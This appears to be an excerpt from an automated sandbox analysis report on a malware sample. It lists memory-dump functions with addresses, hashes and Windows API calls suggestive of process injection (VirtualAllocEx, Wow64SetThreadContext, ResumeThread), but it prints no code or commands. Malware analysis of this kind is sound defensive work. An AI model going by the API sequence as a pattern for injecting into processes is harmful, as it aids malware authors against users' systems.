              Function 0749D278 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
              Download Yara Rule
              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0749D2F8
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
              • Opcode ID: d331bf4256a8beb0732e6d6226e1383be66760e654bacee72fd323341cfe59bf
              • Instruction ID: 9f3ac9874d5586a1604d3652930f60b52ec832a856d9ac426d65fa24c0411aba
              • Opcode Fuzzy Hash: d331bf4256a8beb0732e6d6226e1383be66760e654bacee72fd323341cfe59bf
              • Instruction Fuzzy Hash: 302114B1D002599FCB10DFAAC880AEEBBF5FF48320F10842AE559A7250C7789944CBA4
              Function 0749CFF0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
              Download Yara Rule
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0749D06E
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: f01abed220488d5d22119083cf27b7ab22a891cc2819e2d5cf21a36bfdb8cbdd
              • Instruction ID: 09ecc205d953cf15d5a92bd074dd6cfdcd2964c2c687a251d427d94bff58538d
              • Opcode Fuzzy Hash: f01abed220488d5d22119083cf27b7ab22a891cc2819e2d5cf21a36bfdb8cbdd
              • Instruction Fuzzy Hash: DA2118B1D002098FDB10DFAAC485BEEBBF4EF88324F14842AD559A7241D7789945CFA5
              Function 0749CFE9 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
              Download Yara Rule
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0749D06E
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: b83af40c6ce72c377719d0f510eb6dc9e5b87c200011b866b6d801dac9e3b828
              • Instruction ID: 51b888e87cd4479471f41f00a2b53e82c70d615323e804200197d79ada212a53
              • Opcode Fuzzy Hash: b83af40c6ce72c377719d0f510eb6dc9e5b87c200011b866b6d801dac9e3b828
              • Instruction Fuzzy Hash: 772138B1D00209CFDB10DFA9C585BEEBBF4EF88314F14842AD459A7241C7789945CFA4
              Function 0297AB70 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0297B401,00000800,00000000,00000000), ref: 0297B612
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: e566ab5dc3bebb9f0700cea6c68b8bea147e71c6b0afad83092643112921d314
              • Instruction ID: cbb8fc7cab5ccd0b3df3289906b4456d85aed792e0d8dda8d2a860a93453023d
              • Opcode Fuzzy Hash: e566ab5dc3bebb9f0700cea6c68b8bea147e71c6b0afad83092643112921d314
              • Instruction Fuzzy Hash: EF1114B69003488FDB10CF9AC444ADEFBF4EB48324F14842AD519A7210C375A545CFA4
              Function 0749D0C8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
              Download Yara Rule
              APIs
              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0749D136
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: b5055c39e688c0f3278e73f8a62d736a5ba703712ccb5a5343513b3a6c9ade70
              • Instruction ID: 00038be19981e7c044497db3b058bf229fbc4e43e12827a9a118a3bf1876249b
              • Opcode Fuzzy Hash: b5055c39e688c0f3278e73f8a62d736a5ba703712ccb5a5343513b3a6c9ade70
              • Instruction Fuzzy Hash: 591126B29002499FCB10DFAAC845BDEBFF5EB88320F10842AE559A7250C775A544CFA4
              Function 0297B5A0 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0297B401,00000800,00000000,00000000), ref: 0297B612
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: daaf17fe1d482ba04dff1f55f5e394e737959274d585c7fffce3e3f6ef343009
              • Instruction ID: 01cdd5e74c762da97d709bbd3fa78aca8ae53f47791ba8bee85e0c6246d28f75
              • Opcode Fuzzy Hash: daaf17fe1d482ba04dff1f55f5e394e737959274d585c7fffce3e3f6ef343009
              • Instruction Fuzzy Hash: 9411F3B6D003498FDB10CF9AC944BEEFBF9EB48324F14842AE559A7210C379A545CFA4
              Function 0749D0C1 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
              Download Yara Rule
              APIs
              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0749D136
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: aa1b54a18b84fd28d54f567add09b25958da1d1c45bd3cc298cf1167271c6b04
              • Instruction ID: 543b5da7ffaf8b88911dbd01419c9df46d47b3f71f01b387e59970cd11f86fde
              • Opcode Fuzzy Hash: aa1b54a18b84fd28d54f567add09b25958da1d1c45bd3cc298cf1167271c6b04
              • Instruction Fuzzy Hash: 301156B6900249CFCB10DFA9C945BDEBFF5EF88320F14881AD559A7250C735A544CFA4
              Function 0749CF38 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 46da298c0c4d956226e8cc29147014dd52fd724e54f39e3d30bdc7e85912c2af
              • Instruction ID: 4c06d6f40e2417260b6cedb6964e41003068994c745b1225b9bd9406f06098f0
              • Opcode Fuzzy Hash: 46da298c0c4d956226e8cc29147014dd52fd724e54f39e3d30bdc7e85912c2af
              • Instruction Fuzzy Hash: 5A1158B1D002498FCB20DFAAC445BDEFFF4EF88324F24842AD419A7240D774A944CBA4
              Function 0749CF40 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 56b372b016e9f4ee7ea6b9b908d69969adf7325ef8144a1603b2e35387833024
              • Instruction ID: 8eb9d54d62a8400f1cc8de4ba1c8c9fe4522106fb14cc01db5246a254a05ecde
              • Opcode Fuzzy Hash: 56b372b016e9f4ee7ea6b9b908d69969adf7325ef8144a1603b2e35387833024
              • Instruction Fuzzy Hash: 791125B19002498FCB20DFAAC4457DEFFF4EB88324F20842AD459A7250DB75A944CBA4
              Function 0297B320 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNELBASE(00000000), ref: 0297B386
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: HandleModule
              • String ID:
              • API String ID: 4139908857-0
              • Opcode ID: c705d16c0636d15df15983e6132b1fe398369a6b6a072c43456d95efd0e75e6f
              • Instruction ID: 4fefff87cd48e7910e69c16ea0982b74a26affb89a15fbcb4991dfe238b47b26
              • Opcode Fuzzy Hash: c705d16c0636d15df15983e6132b1fe398369a6b6a072c43456d95efd0e75e6f
              • Instruction Fuzzy Hash: DA11DFB5D007498FCB14DF9AC444ADEFBF8AB88328F10846AD459A7210C375A585CFA5
              Function 07496150 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
              Download Yara Rule
              APIs
              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0749FB5D
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 8c2f27513691a26d62891fbcb6251fe4024bdbfe583f94c49bd4fb605976f677
              • Instruction ID: b1e44dcc041da30756dd80413717a3ae615cb870335eda00a0aa5e9f171df4f4
              • Opcode Fuzzy Hash: 8c2f27513691a26d62891fbcb6251fe4024bdbfe583f94c49bd4fb605976f677
              • Instruction Fuzzy Hash: 0711F5B58003499FCB10DF9AD485BEEBFF8EB48310F10845AE558A7200D375A944CFA5
              Function 00E3D4C4 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1700129539.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e3d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f3fcb6fb83ff8fd004dddd6029baf4d923fa7a3c78eeef9e9903283c5793892b
              • Instruction ID: a053d95d6b0b92a61337410774579f7804fb389b040902e4695184aea9b56098
              • Opcode Fuzzy Hash: f3fcb6fb83ff8fd004dddd6029baf4d923fa7a3c78eeef9e9903283c5793892b
              • Instruction Fuzzy Hash: 01213771508240EFCB05DF14EDC8B27BF65FB98318F20C569E8095B256C336D856CBA1
              Function 00E3D3D8 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1700129539.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e3d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3d5fe7f6c16ff749fb6012b6e043bf18f9ba53723f70895e82c4af26e9c26e3c
              • Instruction ID: 754cb8568b403c4cd182a901b411dc7676a6b61f4fdea7e12c27543662cb4a10
              • Opcode Fuzzy Hash: 3d5fe7f6c16ff749fb6012b6e043bf18f9ba53723f70895e82c4af26e9c26e3c
              • Instruction Fuzzy Hash: 5A213771508204DFDB05DF14EDC8B2ABF65FB98328F20C169E9095B256C336E856CBA2
              Function 00E4D1D4 Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1700236197.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e4d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 00b7f206f719da5e48fb2c444ad7e470da88c525b2aebfdc7c41623dd46eeb40
              • Instruction ID: 6536643e8ada61f01ab5b7063d48cf7e115563ec4f9ea71099230ec67ab213ab
              • Opcode Fuzzy Hash: 00b7f206f719da5e48fb2c444ad7e470da88c525b2aebfdc7c41623dd46eeb40
              • Instruction Fuzzy Hash: 63214971608200DFCB01DF14EDC0B26BBA5FB84318F20C66DE8095B361C3B6D846CA65
              Function 00E4D01C Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1700236197.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e4d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ce9282064178758bc62402a70ecb47ee6d9f10896dd51401f164a95f04a30f73
              • Instruction ID: 2bd4ec3892e04f8fcea28390ad8970b9e78b11edf460b9306d494c8e297fb27b
              • Opcode Fuzzy Hash: ce9282064178758bc62402a70ecb47ee6d9f10896dd51401f164a95f04a30f73
              • Instruction Fuzzy Hash: 2B210471608200DFCB14DF14E9C4B26BFA6FB84318F20C56DD80A5B396C33AD847CA61
              Function 00E4D005 Relevance: .1, Instructions: 62COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1700236197.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e4d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6b94599b01788595bb2177a67f003f7a866502216f715daa2e07db1e370a68ef
              • Instruction ID: adb6b0bf64ec70dded88b1d22e990cdd1801fd421b2966916b7e00c5b5dbe626
              • Opcode Fuzzy Hash: 6b94599b01788595bb2177a67f003f7a866502216f715daa2e07db1e370a68ef
              • Instruction Fuzzy Hash: 7821837550D3808FCB02CF24D994715BF71EB46314F28C5EAD8498F2A7C33A980ACB62
              Function 00E3D4BF Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1700129539.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e3d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
              • Instruction ID: 5ef47d6b489b8f543017d49d86300702a16d40700cfbe5d93199277d323aa85b
              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
              • Instruction Fuzzy Hash: 9811E676504280DFCB16CF14E9C4B16BF71FB94328F24C6A9DC494B656C336D85ACBA1
              Function 00E3D3D3 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1700129539.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e3d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
              • Instruction ID: fccfd203ef65d855980b47aeefe8fe0bb93abf8b86b91b30d17630bd30eb301f
              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
              • Instruction Fuzzy Hash: 34110372404240CFCB12CF10E9C4B16BF71FB94328F24C2A9D8090B256C33AE85ACBA1
              Function 00E4D1CF Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1700236197.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e4d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
              • Instruction ID: 62537df0891861fb48ec09580f84bc6a283946371a911ed30dd4b22f9d164ef6
              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
              • Instruction Fuzzy Hash: C011BB75908280DFCB02CF50D9C4B15BBA1FB84318F24C6AAD8494B6A6C37AD81ACB61
              Function 07480258 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1704630207.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7480000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf47e03c4b3b2196ba212dca2d36be4d2bc92fc9a95961787a84bb98d84cac78
              • Instruction ID: e46d7314dbc3b1b6deb6ba4f56ddb71137986b45aba3f2b347b9ec51a7f075e0
              • Opcode Fuzzy Hash: bf47e03c4b3b2196ba212dca2d36be4d2bc92fc9a95961787a84bb98d84cac78
              • Instruction Fuzzy Hash: BE015EB491425ADFCB11DFA4C4487EEBFF0AB07301F1844DAA464B72E2C7784A45DB55
              Function 07480268 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1704630207.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7480000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 054c8f6e27a1472df81a12d145d8878a9f5cd1c3d73efcb6178ddb95597487d2
              • Instruction ID: d2858e91c6944b2c0192a707ad68ad392244a2a4e6d00afd4c80c1a1acb672d7
              • Opcode Fuzzy Hash: 054c8f6e27a1472df81a12d145d8878a9f5cd1c3d73efcb6178ddb95597487d2
              • Instruction Fuzzy Hash: 62012CB4D04219DFCB54DFA5C808BFEBBF0AB4A301F0484AAA469B32A1D7B44A44DF54

              Non-executed Functions

              Function 050C0040 Relevance: .3, Instructions: 315COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1703155717.00000000050C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_50c0000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d3ed7e0bc570795156885bc95d34eabb2ae852f5857d2162224d0766b46339a0
              • Instruction ID: 714c5f8ec2b1a3da1312d4b1adf67ad5c46bcc2ff9342c1f277a86a6e62780c0
              • Opcode Fuzzy Hash: d3ed7e0bc570795156885bc95d34eabb2ae852f5857d2162224d0766b46339a0
              • Instruction Fuzzy Hash: 4C1260B0422B468ED7208F65ED4E18D7EB1BBC5398B504209E2656F6E1DFBC114BCF4A
              Function 0749C718 Relevance: .3, Instructions: 312COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 983afac40b8e04d06fc2bb7cbb83192d905570a74b352573c42670dc40974765
              • Instruction ID: 87357e1392516a8de61aa5711a8bdddf862cee10d8e17a6935147a300f55aac7
              • Opcode Fuzzy Hash: 983afac40b8e04d06fc2bb7cbb83192d905570a74b352573c42670dc40974765
              • Instruction Fuzzy Hash: C4E1C8B4E001198FDB14DFA9C5809AEFBF2FF89305F24816AD415A7356DB31A941CFA1
              Function 0749A7D0 Relevance: .3, Instructions: 312COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e83eb545878c00f1456da30ca9721dc12370f007bf3278caf41a34ae3812539b
              • Instruction ID: c9ffb5b7a54ce3f0a63004be2c9653e9fdefdbab552d7617079af06d3e7daa65
              • Opcode Fuzzy Hash: e83eb545878c00f1456da30ca9721dc12370f007bf3278caf41a34ae3812539b
              • Instruction Fuzzy Hash: F6E1D7B4E001198FCB14DF99C6849AEBBF2FB89305F24C16AD415AB356DB31AD41CFA0
              Function 0749C2E0 Relevance: .3, Instructions: 312COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7bd2c18c2c7bfd4c35103e6c9090045e0fa995d32483818d3a330e3bb77d69b7
              • Instruction ID: 7069789fc5e90408ec057f66804a9e21ea9fb5974ed97de4a988ea1d44d4772f
              • Opcode Fuzzy Hash: 7bd2c18c2c7bfd4c35103e6c9090045e0fa995d32483818d3a330e3bb77d69b7
              • Instruction Fuzzy Hash: A1E1EAB4E001198FDB14DFA9C6809AEBBF2FF89305F24916AD415A7356DB31AD41CFA0
              Function 0749B040 Relevance: .3, Instructions: 312COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 18d6ba9997b18190713fd53ffcad2236d93ccf9c1c93029e9a62ad390c4cd8d8
              • Instruction ID: 50de2d8d9153eb251d2f54090cb8b4d35422b914037fb9b8eab840633acb6d58
              • Opcode Fuzzy Hash: 18d6ba9997b18190713fd53ffcad2236d93ccf9c1c93029e9a62ad390c4cd8d8
              • Instruction Fuzzy Hash: 1FE1E9B4E001198FCB14DFA9D5819AEBBF2FF89305F24816AD414AB356DB31AD41CF61
              Function 0749AC08 Relevance: .3, Instructions: 312COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9ceb2f675c34c775fe7606daffcc40fea6035c94cb4bff4b596d6a136cccf3a
              • Instruction ID: cfcad7aac58f43a3467fb9792de0a2a605db59e062b943e7b544de4d5ccad66e
              • Opcode Fuzzy Hash: a9ceb2f675c34c775fe7606daffcc40fea6035c94cb4bff4b596d6a136cccf3a
              • Instruction Fuzzy Hash: 92E1B9B4E001198FDB14DFA9D5809AEBBF2FF89305F24C16AD414AB355DB31A941CFA1
              Function 074921D7 Relevance: .3, Instructions: 271COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8b9a00e621be191c8e44e5ba0585c06d6cde92c14f8f57357eaa53008dcca2d7
              • Instruction ID: 19756d17738cb997ad04fc60d119b57a91e80ece1a4fbe224671d24d123a36e9
              • Opcode Fuzzy Hash: 8b9a00e621be191c8e44e5ba0585c06d6cde92c14f8f57357eaa53008dcca2d7
              • Instruction Fuzzy Hash: 7DD1EA31920B5A9ACB11EB64D990A9DF7B1FF95300F109B9AE00937615EB70AAC9CF41
              Function 0297DF74 Relevance: .3, Instructions: 264COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fbe07af77917a23e3bd594b8093f6bf22a6ede1e7f4a9520bade21f7a14531a5
              • Instruction ID: dc9db5f6aaba5a28372b3a29f2bbbd619fed15573aea66c47dbd09aaa0947f3a
              • Opcode Fuzzy Hash: fbe07af77917a23e3bd594b8093f6bf22a6ede1e7f4a9520bade21f7a14531a5
              • Instruction Fuzzy Hash: 57A17E32A10205CFCF15DFB4C9805AEBBB6FF84300B1585AAE805BB265DB75E946CF90
              Function 074921E8 Relevance: .3, Instructions: 264COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b38acf0520ac0832f7c90cec9085b11b4027330eaf7878b765de6bf44cde4d00
              • Instruction ID: 7dd4db5edc0b8a52357312a906446fcfa37f7a525df93d7ca7f834b1a0a96efe
              • Opcode Fuzzy Hash: b38acf0520ac0832f7c90cec9085b11b4027330eaf7878b765de6bf44cde4d00
              • Instruction Fuzzy Hash: 5DD1E931920B5A9ACB11EF64D990A9DF7B1FF95300F10DB9AE00937615EB70AAC9CF41
              Function 050C0A10 Relevance: .2, Instructions: 244COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1703155717.00000000050C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_50c0000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a5137e40d1f2bb78d52288ab9bd848512f0b375c67f82ca89333f4a6fa2f35f8
              • Instruction ID: f5e5ec2330e7e222a230b51fdca46b35da738b2b0c86df3380d540cd850fae9b
              • Opcode Fuzzy Hash: a5137e40d1f2bb78d52288ab9bd848512f0b375c67f82ca89333f4a6fa2f35f8
              • Instruction Fuzzy Hash: D1A100B1D147499FCB14CFA9D884ADEBBB1FF89300F24826EE419AB251D7709885CF91
              Function 050C0006 Relevance: .2, Instructions: 239COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1703155717.00000000050C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_50c0000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c94320e7c7166d47883e2115fd0c5b591918a54c4fd1498281be4384cc2ee97
              • Instruction ID: 4b8406cc0c7e490a8985f5aaac011560371d2739247b4dc3823fa3e7064903d0
              • Opcode Fuzzy Hash: 7c94320e7c7166d47883e2115fd0c5b591918a54c4fd1498281be4384cc2ee97
              • Instruction Fuzzy Hash: 76C1C1B0821B468ED720CF65EC4A28D7FB1BBC5368B554209E1616F6E1DFB8144BCF4A

              Execution Graph

              Execution Coverage:1.6%
              Dynamic/Decrypted Code Coverage:2.7%
              Signature Coverage:5.8%
              Total number of Nodes:549
              Total number of Limit Nodes:66
